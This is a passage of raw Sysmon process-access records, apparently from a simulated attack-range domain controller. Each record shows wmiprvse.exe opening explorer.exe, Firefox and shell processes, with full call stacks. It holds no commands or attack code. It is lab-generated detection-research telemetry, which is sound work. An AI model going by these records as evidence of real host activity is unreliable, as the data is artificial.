T4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236482Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236481Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236480Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236479Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236478Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236477Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236476Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236475Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236474Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236473Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236472Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236471Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236470Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.793{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236469Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236468Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236467Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236466Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236465Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.774{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 